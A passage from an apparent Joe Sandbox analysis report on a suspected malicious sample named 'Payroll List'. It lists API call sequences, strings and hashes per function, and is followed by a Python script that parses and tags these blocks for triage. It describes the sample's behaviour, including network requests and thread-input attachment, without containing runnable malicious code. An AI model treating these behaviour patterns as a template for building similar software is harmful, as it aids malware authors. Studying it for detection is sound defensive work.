                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1383977212-1403004172
                                                                    • Opcode ID: 110a7a10f17a7b0605d6e5d2be6ad38101a999580cb6258f2fe2b8c34d820635
                                                                    • Instruction ID: 94be8c5ff966343143e25b448e4c2855428419d1481dac73d02fd848fef2e1c6
                                                                    • Opcode Fuzzy Hash: 110a7a10f17a7b0605d6e5d2be6ad38101a999580cb6258f2fe2b8c34d820635
                                                                    • Instruction Fuzzy Hash: 422104B4A00108BFDB04EFA0DC85EFEBB78EF55300F100015F962A7291EBB54869DB60
                                                                    APIs
                                                                    • GetParent.USER32 ref: 0015BAE3
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0015BAF8
                                                                    • _wcscmp.LIBCMT ref: 0015BB0A
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0015BB85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: 17a64852c08836f0670cad333de9e8143d3cc68401fc0d88cdef7471375ecb7e
                                                                    • Instruction ID: 68a66c59ff16fc812286a322075960d66f70e184f8898fc79404f717bcf922d8
                                                                    • Opcode Fuzzy Hash: 17a64852c08836f0670cad333de9e8143d3cc68401fc0d88cdef7471375ecb7e
                                                                    • Instruction Fuzzy Hash: AA11297660C703FAFA256635EC47DA6379CDB35320B200022FE29E94E5FBF168954514
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0017B2D5
                                                                    • CoInitialize.OLE32(00000000), ref: 0017B302
                                                                    • CoUninitialize.OLE32 ref: 0017B30C
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0017B40C
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0017B539
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0017B56D
                                                                    • CoGetObject.OLE32(?,00000000,001AD91C,?), ref: 0017B590
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0017B5A3
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0017B623
                                                                    • VariantClear.OLEAUT32(001AD91C), ref: 0017B633
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2395222682-0
                                                                    • Opcode ID: f5119161292ac27eb6eb72be98c027cc4752839a0e9191d853ae38ba680747f0
                                                                    • Instruction ID: 90271d37d27a95ca13cf9ea12bbd5bf79f8f21547871a658077a168bf62b348d
                                                                    • Opcode Fuzzy Hash: f5119161292ac27eb6eb72be98c027cc4752839a0e9191d853ae38ba680747f0
                                                                    • Instruction Fuzzy Hash: AEC10371608305AFC704DF64D884A6BB7F9BF89308F00895DF58A9B251DB71ED45CB52
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 0014ACC1
                                                                      • Part of subcall function 00147CF4: __mtinitlocknum.LIBCMT ref: 00147D06
                                                                      • Part of subcall function 00147CF4: EnterCriticalSection.KERNEL32(00000000,?,00147ADD,0000000D), ref: 00147D1F
                                                                    • __calloc_crt.LIBCMT ref: 0014ACD2
                                                                      • Part of subcall function 00146986: __calloc_impl.LIBCMT ref: 00146995
                                                                      • Part of subcall function 00146986: Sleep.KERNEL32(00000000,000003BC,0013F507,?,0000000E), ref: 001469AC
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0014ACED
                                                                    • GetStartupInfoW.KERNEL32(?,001D6E28,00000064,00145E91,001D6C70,00000014), ref: 0014AD46
                                                                    • __calloc_crt.LIBCMT ref: 0014AD91
                                                                    • GetFileType.KERNEL32(00000001), ref: 0014ADD8
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0014AE11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1426640281-0
                                                                    • Opcode ID: 1c597af390fb2129aaeadf7d064b97139f68af1add7bab6c4f8a79551a713fe7
                                                                    • Instruction ID: ffcc6586abf6e60a65416f88f7af3ac43478e119ca486e4816d2792615d08294
                                                                    • Opcode Fuzzy Hash: 1c597af390fb2129aaeadf7d064b97139f68af1add7bab6c4f8a79551a713fe7
                                                                    • Instruction Fuzzy Hash: 8781F4B1D457418FDB14CFA8C8805ADBBF0AF0A324BA5426DD4A6AB7E1C7349843CB52
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 001667FD
                                                                    • __swprintf.LIBCMT ref: 0016680A
                                                                      • Part of subcall function 0014172B: __woutput_l.LIBCMT ref: 00141784
                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00166834
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00166840
                                                                    • LockResource.KERNEL32(00000000), ref: 0016684D
                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0016686D
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0016687F
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0016688E
                                                                    • LockResource.KERNEL32(?), ref: 0016689A
                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001668F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                    • String ID:
                                                                    • API String ID: 1433390588-0
                                                                    • Opcode ID: 9e9ee43904318787425a1696b90df7caed074db670adeaf9de221e2188839dd2
                                                                    • Instruction ID: b1b653a982336548a38735bc836160edb5bb16994c69288b4a17f82f29c012be
                                                                    • Opcode Fuzzy Hash: 9e9ee43904318787425a1696b90df7caed074db670adeaf9de221e2188839dd2
                                                                    • Instruction Fuzzy Hash: B4316D7190025AABDB119FB1ED95ABE7BACEF09341B008426F902E7550E734D9A1DBA0
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00164047
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001630A5,?,00000001), ref: 0016405B
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00164062
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001630A5,?,00000001), ref: 00164071
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00164083
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001630A5,?,00000001), ref: 0016409C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001630A5,?,00000001), ref: 001640AE
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001630A5,?,00000001), ref: 001640F3
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001630A5,?,00000001), ref: 00164108
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001630A5,?,00000001), ref: 00164113
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 11c5db9a9d9b929778606bc3ebadbaa287cce1dce79663acf5e13ef61dbab930
                                                                    • Instruction ID: 4358b5af54dd0d066943fb830a80b208303d4b020b71330bcf1a14167742f008
                                                                    • Opcode Fuzzy Hash: 11c5db9a9d9b929778606bc3ebadbaa287cce1dce79663acf5e13ef61dbab930
                                                                    • Instruction Fuzzy Hash: 8D31A5B1500214AFDB10DF95EC89BBD77AABB56312F218106F915DBA90CBB4EDC08B60
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 0013B496
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0013B4A0
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0013B4B5
                                                                    • GetStockObject.GDI32(00000005), ref: 0013B4BD
                                                                    • GetClientRect.USER32(?), ref: 0019DD63
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0019DD7A
                                                                    • GetWindowDC.USER32(?), ref: 0019DD86
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0019DD95
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0019DDA7
                                                                    • GetSysColor.USER32(00000005), ref: 0019DDC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 3430376129-0
                                                                    • Opcode ID: fa983a59eaff0ac659d558d5334247fe86335fe1d3996c37b20663985ea8e5ae
                                                                    • Instruction ID: fa9e91f71d780cf7a23c2482fe6f8ed2144a106e89d306505136c30fa4dd4ed6
                                                                    • Opcode Fuzzy Hash: fa983a59eaff0ac659d558d5334247fe86335fe1d3996c37b20663985ea8e5ae
                                                                    • Instruction Fuzzy Hash: BC114C71500605AFDB216FB4FC48BE97BB1EB06325F118625FA6B958E2DB310981DB21
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,0015CF50), ref: 0015CE90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 3555792229-1603158881
                                                                    • Opcode ID: 60e3b215b5b1087d7f17b87965ab8b5ba69bb519c5f01bda01a61db1ad1cac81
                                                                    • Instruction ID: 3d87dc2e1cb805f31924d86f19be70a629d14cc0f92b7f97b0a80ed5b2b91088
                                                                    • Opcode Fuzzy Hash: 60e3b215b5b1087d7f17b87965ab8b5ba69bb519c5f01bda01a61db1ad1cac81
                                                                    • Instruction Fuzzy Hash: 46912F30600606EECB18DFA0C482BEAFBB5FF14341F55851AD869BB191DF70A95ADBD0
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001230DC
                                                                    • CoUninitialize.OLE32(?,00000000), ref: 00123181
                                                                    • UnregisterHotKey.USER32(?), ref: 001232A9
                                                                    • DestroyWindow.USER32(?), ref: 00195079
                                                                    • FreeLibrary.KERNEL32(?), ref: 001950F8
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00195125
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: 84fdb8c291aa4a91301323e5676b0321b9721a8f022506a3a4edb94818ec0dd4
                                                                    • Instruction ID: 39174fc65b6864399198e26ae5b1a66c86a91179675031b3367d8ba194173b93
                                                                    • Opcode Fuzzy Hash: 84fdb8c291aa4a91301323e5676b0321b9721a8f022506a3a4edb94818ec0dd4
                                                                    • Instruction Fuzzy Hash: 29912B30600222CFCB0AEF14E895A68F3B5FF25304F5541A9E51AA7662DB34AE66CF54
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0013CC15
                                                                      • Part of subcall function 0013CCCD: GetClientRect.USER32(?,?), ref: 0013CCF6
                                                                      • Part of subcall function 0013CCCD: GetWindowRect.USER32(?,?), ref: 0013CD37
                                                                      • Part of subcall function 0013CCCD: ScreenToClient.USER32(?,?), ref: 0013CD5F
                                                                    • GetDC.USER32 ref: 0019D137
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0019D14A
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0019D158
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0019D16D
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0019D175
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0019D200
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: 5a050770292fbee22856e3ae9d351bd42819c8e01b5d9800c11c350279f02c4f
                                                                    • Instruction ID: b6d1b0584fbb9cf64cd11c6928e143a39c0ca800584af5a30f5df8ba906822c3
                                                                    • Opcode Fuzzy Hash: 5a050770292fbee22856e3ae9d351bd42819c8e01b5d9800c11c350279f02c4f
                                                                    • Instruction Fuzzy Hash: 1A71FF31400205EFCF259F64EC85AEA7BB5FF59350F184269FD5A6A2A6C7318C81DFA0
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                      • Part of subcall function 0013B63C: GetCursorPos.USER32(000000FF), ref: 0013B64F
                                                                      • Part of subcall function 0013B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0013B66C
                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000001), ref: 0013B691
                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000002), ref: 0013B69F
                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0018ED3C
                                                                    • ImageList_EndDrag.COMCTL32 ref: 0018ED42
                                                                    • ReleaseCapture.USER32 ref: 0018ED48
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0018EDF0
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0018EE03
                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0018EEDC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                    • API String ID: 1924731296-2107944366
                                                                    • Opcode ID: 16cd3e755992ff968f513de0fc23c73bfefaa6d96a21eec519102a5634a91013
                                                                    • Instruction ID: 62057a66be54817095133e4de4f38dcfd0b6623a70a1eafc34f6f7b1d5ad453c
                                                                    • Opcode Fuzzy Hash: 16cd3e755992ff968f513de0fc23c73bfefaa6d96a21eec519102a5634a91013
                                                                    • Instruction Fuzzy Hash: A951A970204304AFD714EF20EC86FAE77E4BB98714F40491DF995972E2DBB09A94CB52
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001745FF
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0017462B
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0017466D
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00174682
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0017468F
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001746BF
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00174706
                                                                      • Part of subcall function 00175052: GetLastError.KERNEL32(?,?,001743CC,00000000,00000000,00000001), ref: 00175067
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 1241431887-3916222277
                                                                    • Opcode ID: c7dd9d58c52c1555d8af6b193cdebd351823369e8b0b56261da43db0b56d0c7b
                                                                    • Instruction ID: 1c199c2e17c4bd31d634ad465877e12b5541f3ba16d95439e17b1f98f864298b
                                                                    • Opcode Fuzzy Hash: c7dd9d58c52c1555d8af6b193cdebd351823369e8b0b56261da43db0b56d0c7b
                                                                    • Instruction Fuzzy Hash: 77417CB1501619BFEB169FA0DC85FBA77BCFF09314F108116FA099A151D7B09A448BA4
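The function blocks above (the AttachThreadInput/GetForegroundWindow sequence, the WinINet request sequence, and the rest) list each call as a raw name, module, stack-slot arguments and a reference address, with "?" where the sandbox could not resolve a value and "Part of subcall function" for calls one level down. Triaging a few hundred of these blocks by eye is slow, so a practitioner usually parses them into records and tags the functions worth opening in the disassembler. The script below is an added example written for this page, not part of Joe Sandbox or of the report: the sample text is constructed from two trimmed blocks in the same shape as those above, the tag categories are this script's own convention, and the constant tables cover only two documented WinINet values that appear in the WinINet block (INTERNET_OPTION_SECURITY_FLAGS = 0x1F, HTTP_QUERY_CONTENT_LENGTH = 5).

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: two function blocks in the shape of the report above (trimmed).
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00164047
• GetForegroundWindow.USER32(00000000,?,?), ref: 0016405B
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00164071
  • Part of subcall function 0013B63C: GetCursorPos.USER32(000000FF), ref: 0013B64F
Memory Dump Source
• Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001745FF
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00174682
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001746BF
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
"""

# One API line: optional "Part of subcall function <addr>:", then Name.MODULE(args), ref: <addr>.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[\w@]+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Strings"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]   # callee address when the call sits one level down

@dataclass
class Function:
    calls: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # "API ID", "API String ID", hashes, ...

def parse_report(text):
    """Split the report text into one Function record per "APIs" block."""
    funcs, cur, in_apis = [], None, False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur, in_apis = Function(), True
            funcs.append(cur)
            continue
        if cur is None:
            continue
        if s in SECTION_HEADERS:
            in_apis = False
            continue
        m = API_RE.match(line) if in_apis else None
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.meta[f["key"].strip()] = f["val"].strip()
    return funcs

# Assumed tag rules for triage (this script's convention, not a Joe Sandbox signature).
TAGS = {
    "network": {"InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW",
                "InternetSetOptionW", "HttpQueryInfoW"},
    "thread_input": {"AttachThreadInput"},
    "resource_unpack": {"FindResourceW", "LoadResource", "LockResource", "SizeofResource"},
}
# Documented WinINet constants, used to make the raw stack slots readable.
INTERNET_OPTIONS = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {0x05: "HTTP_QUERY_CONTENT_LENGTH"}

def tags_for(func):
    """Tag on direct calls only; subcall lines belong to another function."""
    names = {c.name for c in func.calls if c.subcall is None}
    return sorted(t for t, apis in TAGS.items() if names & apis)

def decode_arg(call, index, table):
    """Symbolic name for the index-th argument, or the raw slot text ("?" stays "?")."""
    raw = call.args[index] if index < len(call.args) else "?"
    try:
        return table.get(int(raw, 16), raw)
    except ValueError:
        return raw

def summarize(text):
    rows = []
    for fn in parse_report(text):
        row = {"api_id": fn.meta.get("API ID", ""), "calls": len(fn.calls), "tags": tags_for(fn)}
        for c in fn.calls:
            if c.name == "InternetSetOptionW":
                row["option"] = decode_arg(c, 1, INTERNET_OPTIONS)   # dwOption is the 2nd argument
            if c.name == "HttpQueryInfoW":
                row["query"] = decode_arg(c, 1, HTTP_QUERY)          # dwInfoLevel is the 2nd argument
        rows.append(row)
    return rows

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

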